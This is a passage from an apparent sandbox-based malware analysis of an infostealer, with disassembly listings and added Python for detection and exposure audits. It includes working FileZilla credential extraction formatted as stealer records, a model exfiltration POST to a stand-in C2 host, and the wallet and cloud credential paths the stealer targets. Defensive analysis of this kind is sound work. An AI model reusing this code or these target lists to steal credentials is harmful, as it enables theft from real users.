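            "host": (srv.findtext("Host") or "").strip(),
            "port": (srv.findtext("Port") or "").strip(),
            "user": (srv.findtext("User") or "").strip(),
            "password": password,
        })
    return servers


def format_stealer_record(entry: dict) -> str:
    """Build the record the sample concatenates with lstrcat.

    The literals are the ones in the listing ('browser: FileZilla', 'profile: null',
    'url: ', 'login: ', 'password: '). The ':' between host and port and the
    newline between fields are assumptions; the listing shows only their addresses.
    """
    password = entry["password"] if entry["password"] is not None else ""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {entry['host']}:{entry['port']}\n"
        f"login: {entry['user']}\n"
        f"password: {password}\n"
    )


def count_recoverable_credentials(xml_text: str) -> int:
    """Defensive check: number of entries whose password a stealer can recover as-is."""
    return sum(1 for e in extract_filezilla_servers(xml_text) if e["password"])


if __name__ == "__main__":
    for entry in extract_filezilla_servers(SAMPLE_RECENTSERVERS_XML):
        print(format_stealer_record(entry))
    print("recoverable credentials:", count_recoverable_credentials(SAMPLE_RECENTSERVERS_XML))
```

Run `count_recoverable_credentials` over a user's real `recentservers.xml` and `sitemanager.xml` to see what this family would obtain from that host; any non-zero result is a reason to prefer key-based or interactive logon types in FileZilla and to rotate the affected accounts after an infection.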
                            APIs
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                              • Part of subcall function 00F34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00F34889
                              • Part of subcall function 00F34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00F34899
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00F35A48
                            • StrCmpCA.SHLWAPI(?,0098E540), ref: 00F35A63
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00F35BE3
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0098E530,00000000,?,00989948,00000000,?,00F51B4C), ref: 00F35EC1
                            • lstrlen.KERNEL32(00000000), ref: 00F35ED2
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00F35EE3
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F35EEA
                            • lstrlen.KERNEL32(00000000), ref: 00F35EFF
                            • lstrlen.KERNEL32(00000000), ref: 00F35F28
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00F35F41
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00F35F6B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00F35F7F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00F35F9C
                            • InternetCloseHandle.WININET(00000000), ref: 00F36000
                            • InternetCloseHandle.WININET(00000000), ref: 00F3600D
                            • HttpOpenRequestA.WININET(00000000,0098E440,?,0098DA70,00000000,00000000,00400100,00000000), ref: 00F35C48
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • InternetCloseHandle.WININET(00000000), ref: 00F36017
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                             • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: d11196e4b6143e931ea4dbee4c8b76e0313bcedc03146ca43ba5e67c5b4fcf19
                            • Instruction ID: 6fe44051867904c8c10de77a4f348b757aafe580cb1096d9e8dbdb37737ffd95
                            • Opcode Fuzzy Hash: d11196e4b6143e931ea4dbee4c8b76e0313bcedc03146ca43ba5e67c5b4fcf19
                            • Instruction Fuzzy Hash: B7123E72960528ABDB15EBA0DCA6FEEB739BF54700F004199F50663092EF346A48DF61
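The call sequence above is a WinINet HTTP client: InternetCrackUrlA (subcall 00F34800) splits the C2 URL, InternetOpenA(NULL, 1, ...) selects INTERNET_OPEN_TYPE_DIRECT (no proxy), InternetConnectA(..., 3, ...) asks for INTERNET_SERVICE_HTTP, HttpOpenRequestA receives dwFlags 0x00400100, which is INTERNET_FLAG_KEEP_CONNECTION (0x00400000) | INTERNET_FLAG_PRAGMA_NOCACHE (0x00000100), and the body is assembled with lstrcat from the `"` and `------` literals in the string list, which is what a multipart/form-data POST looks like when built by string concatenation. The reply is then drained with InternetReadFile into a 0xC7-byte (199-byte) buffer. The following is an added example, not code from the sample or the report: a Python model of that request and of its analyst-side inverse, so that a PCAP or proxy log can be compared against the expected shape, with the WinINet constants spelled out. The boundary (taken to be the literal `------`), the verb, path, host and form field names are assumptions; the listing shows only their addresses (0098E440, 0098DA70), and the real sample may use a longer boundary.

```python
import re

# WinINet constants (wininet.h) behind the argument values visible in the listing.
INTERNET_OPEN_TYPE_DIRECT = 1              # InternetOpenA(NULL, 1, ...): no proxy
INTERNET_SERVICE_HTTP = 3                  # InternetConnectA(..., 3, ...)
INTERNET_FLAG_KEEP_CONNECTION = 0x00400000
INTERNET_FLAG_PRAGMA_NOCACHE = 0x00000100
OPEN_REQUEST_FLAGS = 0x00400100            # HttpOpenRequestA dwFlags in the listing

# Assumption: the '------' literal in the string list is the multipart boundary.
# The real sample may use a longer boundary; field names below are constructed.
BOUNDARY = "------"


def build_multipart_body(fields: dict[str, bytes], boundary: str = BOUNDARY) -> bytes:
    """Assemble a multipart/form-data body by plain concatenation.

    This is the shape an lstrcat chain over '--', the boundary, the quoted
    Content-Disposition name and CRLFs produces. Values are not escaped, exactly
    as in the sample, so a value containing the boundary would corrupt the body.
    """
    out = bytearray()
    for name, value in fields.items():
        out += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
        out += value + b"\r\n"
    out += f"--{boundary}--\r\n".encode()
    return bytes(out)


def render_request(host: str, port: int, verb: str, path: str, body: bytes,
                   boundary: str = BOUNDARY) -> bytes:
    """Minimal wire form of the request the InternetConnectA / HttpOpenRequestA /
    HttpSendRequestA sequence emits. WinINet adds further headers (User-Agent,
    Accept) that are not modelled here; HTTP/1.1 and the Host form are assumed.
    """
    headers = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {host}:{port}\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: Keep-Alive\r\n"   # effect of INTERNET_FLAG_KEEP_CONNECTION
        "Pragma: no-cache\r\n"         # effect of INTERNET_FLAG_PRAGMA_NOCACHE
        "\r\n"
    )
    return headers.encode() + body


_DISPOSITION = re.compile(rb'Content-Disposition:\s*form-data;\s*name="([^"]*)"', re.I)


def parse_multipart_body(body: bytes, boundary: str) -> dict[str, bytes]:
    """Analyst-side inverse: recover name -> value from a captured body."""
    delimiter = f"--{boundary}".encode()
    fields: dict[str, bytes] = {}
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):          # closing delimiter reached
            break
        head, _, value = part.partition(b"\r\n\r\n")
        m = _DISPOSITION.search(head)
        if m:
            fields[m.group(1).decode()] = value[:-2] if value.endswith(b"\r\n") else value
    return fields


def decode_open_request_flags(flags: int) -> list[str]:
    """Name the bits of an HttpOpenRequestA dwFlags value (only the two bits seen here are mapped)."""
    names = {INTERNET_FLAG_KEEP_CONNECTION: "INTERNET_FLAG_KEEP_CONNECTION",
             INTERNET_FLAG_PRAGMA_NOCACHE: "INTERNET_FLAG_PRAGMA_NOCACHE"}
    out = [name for bit, name in names.items() if flags & bit]
    leftover = flags & ~sum(names)
    if leftover:
        out.append(f"unknown:0x{leftover:08X}")
    return out


if __name__ == "__main__":
    # Constructed payload: the kind of text record the credential routines build.
    body = build_multipart_body({"file": b"browser: FileZilla\nprofile: null\n"})
    print(render_request("c2.example.test", 80, "POST", "/", body).decode())
    print(parse_multipart_body(body, BOUNDARY))
    print(decode_open_request_flags(OPEN_REQUEST_FLAGS))
```

For detection, the useful properties are the ones the sample cannot easily vary without recompiling: a multipart boundary made only of dashes, `Pragma: no-cache` on a POST from a process that is not a browser, and the response being consumed in fixed 199-byte reads; a proxy log that records the Content-Type header is enough to check the first two.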
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F48CF0: GetSystemTime.KERNEL32(00F50E1B,00989BB8,00F505B6,?,?,00F313F9,?,0000001A,00F50E1B,00000000,?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F48D16
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F3D083
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00F3D1C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00F3D1CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D308
                            • lstrcat.KERNEL32(?,00F51570), ref: 00F3D317
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D32A
                            • lstrcat.KERNEL32(?,00F51574), ref: 00F3D339
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D34C
                            • lstrcat.KERNEL32(?,00F51578), ref: 00F3D35B
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D36E
                            • lstrcat.KERNEL32(?,00F5157C), ref: 00F3D37D
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D390
                            • lstrcat.KERNEL32(?,00F51580), ref: 00F3D39F
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D3B2
                            • lstrcat.KERNEL32(?,00F51584), ref: 00F3D3C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00F3D3D4
                            • lstrcat.KERNEL32(?,00F51588), ref: 00F3D3E3
                              • Part of subcall function 00F4AB30: lstrlen.KERNEL32(00F34F55,?,?,00F34F55,00F50DDF), ref: 00F4AB3B
                              • Part of subcall function 00F4AB30: lstrcpy.KERNEL32(00F50DDF,00000000), ref: 00F4AB95
                            • lstrlen.KERNEL32(?), ref: 00F3D42A
                            • lstrlen.KERNEL32(?), ref: 00F3D439
                              • Part of subcall function 00F4AD80: StrCmpCA.SHLWAPI(00000000,00F51568,00F3D2A2,00F51568,00000000), ref: 00F4AD9F
                            • DeleteFileA.KERNEL32(00000000), ref: 00F3D4B4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                            • String ID:
                            • API String ID: 1956182324-0
                            • Opcode ID: c7277f50de350334acf8f8a3de7f9de635859f114c42bd77268bcb2eb9ae10ec
                            • Instruction ID: 600700296369ce8be07916d8f14750e534fc64022ec5e4a6f6ce1cba64371200
                            • Opcode Fuzzy Hash: c7277f50de350334acf8f8a3de7f9de635859f114c42bd77268bcb2eb9ae10ec
                            • Instruction Fuzzy Hash: 56E15371950108AFDB15EBA0ED9AEEE7739BF54301F004654F90676092EF39BE08DB62
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                              • Part of subcall function 00F4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F4AC82
                              • Part of subcall function 00F4AC30: lstrcat.KERNEL32(00000000), ref: 00F4AC92
                              • Part of subcall function 00F4ABB0: lstrcpy.KERNEL32(?,00F50E1A), ref: 00F4AC15
                              • Part of subcall function 00F4ACC0: lstrlen.KERNEL32(?,00988980,?,\Monero\wallet.keys,00F50E1A), ref: 00F4ACD5
                              • Part of subcall function 00F4ACC0: lstrcpy.KERNEL32(00000000), ref: 00F4AD14
                              • Part of subcall function 00F4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F4AD22
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0098CD90,00000000,?,00F51544,00000000,?,?), ref: 00F3CB6C (dwDesiredAccess 0x80000000 = GENERIC_READ, dwShareMode 1 = FILE_SHARE_READ, dwCreationDisposition 3 = OPEN_EXISTING)
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00F3CB89 (dwMoveMethod 2 = FILE_END)
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 00F3CB95
                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00F3CBA8 (dwMoveMethod 0 = FILE_BEGIN: rewind before the single ReadFile of the whole file)
                            • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00F3CBD9
                            • StrStrA.SHLWAPI(?,0098CCB8,00F50B56), ref: 00F3CBF7
                            • StrStrA.SHLWAPI(00000000,0098CCE8), ref: 00F3CC1E
                            • StrStrA.SHLWAPI(?,0098D458,00000000,?,00F51550,00000000,?,00000000,00000000,?,00988A40,00000000,?,00F5154C,00000000,?), ref: 00F3CDA2
                            • StrStrA.SHLWAPI(00000000,0098D6D8), ref: 00F3CDB9
                              • Part of subcall function 00F3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00F3C971
                              • Part of subcall function 00F3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00F3C97C
                            • StrStrA.SHLWAPI(?,0098D6D8,00000000,?,00F51554,00000000,?,00000000,00988B30), ref: 00F3CE5A
                            • StrStrA.SHLWAPI(00000000,009889C0), ref: 00F3CE71
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B47), ref: 00F3CA43
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B4B), ref: 00F3CA57
                              • Part of subcall function 00F3C920: lstrcat.KERNEL32(?,00F50B4E), ref: 00F3CA78
                            • lstrlen.KERNEL32(00000000), ref: 00F3CF44
                            • CloseHandle.KERNEL32(00000000), ref: 00F3CF9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                            • String ID:
                            • API String ID: 3744635739-3916222277
                            • Opcode ID: f86441c32b78ca11d27e71ac34e8933af5549f520d9599cdd1957eef4efb96d3
                            • Instruction ID: 25f11ebbddb7a1faa3f0b9e874109df70d4b3fb6fab05f4df59de08c6903b1ce
                            • Opcode Fuzzy Hash: f86441c32b78ca11d27e71ac34e8933af5549f520d9599cdd1957eef4efb96d3
                            • Instruction Fuzzy Hash: 74E11C72940108ABDB15EBA4DCA6FEEBB79FF54300F004199F50663192EF386A49DF61
                            APIs
                              • Part of subcall function 00F4AA50: lstrcpy.KERNEL32(00F50E1A,00000000), ref: 00F4AA98
                            • RegOpenKeyExA.ADVAPI32(00000000,0098AB00,00000000,00020019,00000000,00F505BE), ref: 00F48534 (samDesired 0x20019 = KEY_READ)
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00F485B6
                            • wsprintfA.USER32 ref: 00F485E9
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00F4860B
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F4861C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00F48629
                              • Part of subcall function 00F4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00F4AAF6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseOpenlstrcpy$Enumwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 3246050789-3278919252
                            • Opcode ID: ed373af095cc6782bb5853f19266b7a33a96dafeacaecfbb02d349413c6f8f41
                            • Instruction ID: b804a51baad8511a63a055dd0ac3b43e839b36e4213fc49498d3d800bb1e8a46
                            • Opcode Fuzzy Hash: ed373af095cc6782bb5853f19266b7a33a96dafeacaecfbb02d349413c6f8f41
                            • Instruction Fuzzy Hash: 8D814071910118ABEB24DB54CD95FEEB7B8FF48300F1082D8E509A6181DF746B85DFA0
                            APIs
                              • Part of subcall function 00F48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F48F9B (nFolder 0x1C = CSIDL_LOCAL_APPDATA)
                            • lstrcat.KERNEL32(?,00000000), ref: 00F45000
                            • lstrcat.KERNEL32(?,\.azure\), ref: 00F4501D
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44B7C
                              • Part of subcall function 00F44B60: FindFirstFileA.KERNEL32(?,?), ref: 00F44B93
                            • lstrcat.KERNEL32(?,00000000), ref: 00F4508C
                            • lstrcat.KERNEL32(?,\.aws\), ref: 00F450A9
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC4), ref: 00F44BC1
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F50FC8), ref: 00F44BD7
                              • Part of subcall function 00F44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00F44DCD
                              • Part of subcall function 00F44B60: FindClose.KERNEL32(000000FF), ref: 00F44DE2
                            • lstrcat.KERNEL32(?,00000000), ref: 00F45118
                            • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00F45135
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44C00
                              • Part of subcall function 00F44B60: StrCmpCA.SHLWAPI(?,00F508D3), ref: 00F44C15
                              • Part of subcall function 00F44B60: wsprintfA.USER32 ref: 00F44C32
                              • Part of subcall function 00F44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00F44C6E
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,0098E470), ref: 00F44C9A
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,00F50FE0), ref: 00F44CAC
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,?), ref: 00F44CC0
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,00F50FE4), ref: 00F44CD2
                              • Part of subcall function 00F44B60: lstrcat.KERNEL32(?,?), ref: 00F44CE6
                              • Part of subcall function 00F44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00F44CFC
                              • Part of subcall function 00F44B60: DeleteFileA.KERNEL32(?), ref: 00F44D81
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2113382446.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                            • Associated: 00000000.00000002.2113369666.0000000000F30000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000000F5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000106D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001079000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113382446.0000000001206000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.000000000121A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000013A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.0000000001483000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014AF000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113566738.00000000014BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113787740.00000000014BF000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113892825.000000000165F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2113906826.0000000001660000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                            • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                            • API String ID: 949356159-974132213
                            • Opcode ID: a3839b59d02839d08e6e590d5fe7e999fe85bf5b20afd6cfd5e2c3fadd71274a
                            • Instruction ID: 7c1c11748e218c27ba8b79d8526f0f9a1f815e0d411cd4f54ac69d72ca1e862f
                            • Opcode Fuzzy Hash: a3839b59d02839d08e6e590d5fe7e999fe85bf5b20afd6cfd5e2c3fadd71274a
                            • Instruction Fuzzy Hash: 2741C6BA94020467DB60F770EC9BFED3738AB54701F000554BA89650C2EEB8A7CCDB92
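The routine above resolves a base folder with SHGetFolderPathA (CSIDL_LOCAL_APPDATA), appends \.azure\, \.aws\ and \.IdentityService\ with lstrcat, walks each with FindFirstFileA("*.*") / FindNextFileA and copies every match (its loot labels are the Azure\.azure, Azure\.aws and Azure\.IdentityService strings). The Python below is an added exposure audit, not code from the report or from the sample: it lists what that routine would collect from a profile so a responder can see which cloud CLI credential stores were at risk. The base directories to pass on a real host (%USERPROFILE% and %LOCALAPPDATA%), the recursive walk and the sample tree are assumptions; the folder names are the ones visible in the listing.

```python
"""Added audit example: which files the cloud-credential routine would collect."""
import tempfile
from pathlib import Path

# Folder names taken from the String ID field of the listing. Key: the loot
# sub-folder label the routine uses for the copies ("Azure\.aws" and so on);
# value: the directory it appends to the base path with lstrcat before walking.
TARGET_FOLDERS = {
    r"Azure\.azure": ".azure",
    r"Azure\.aws": ".aws",
    r"Azure\.IdentityService": ".IdentityService",
}


def find_cloud_credential_files(base_dirs):
    """Return (loot_label, relative_path) for every file the routine would copy.

    base_dirs: directories to check. ASSUMPTION: on a live host pass
    %USERPROFILE% (where .azure and .aws normally sit) and %LOCALAPPDATA%
    (CSIDL 0x1C, the folder the listing resolves via SHGetFolderPathA and
    where .IdentityService\\msal.cache lives). The listing shows a
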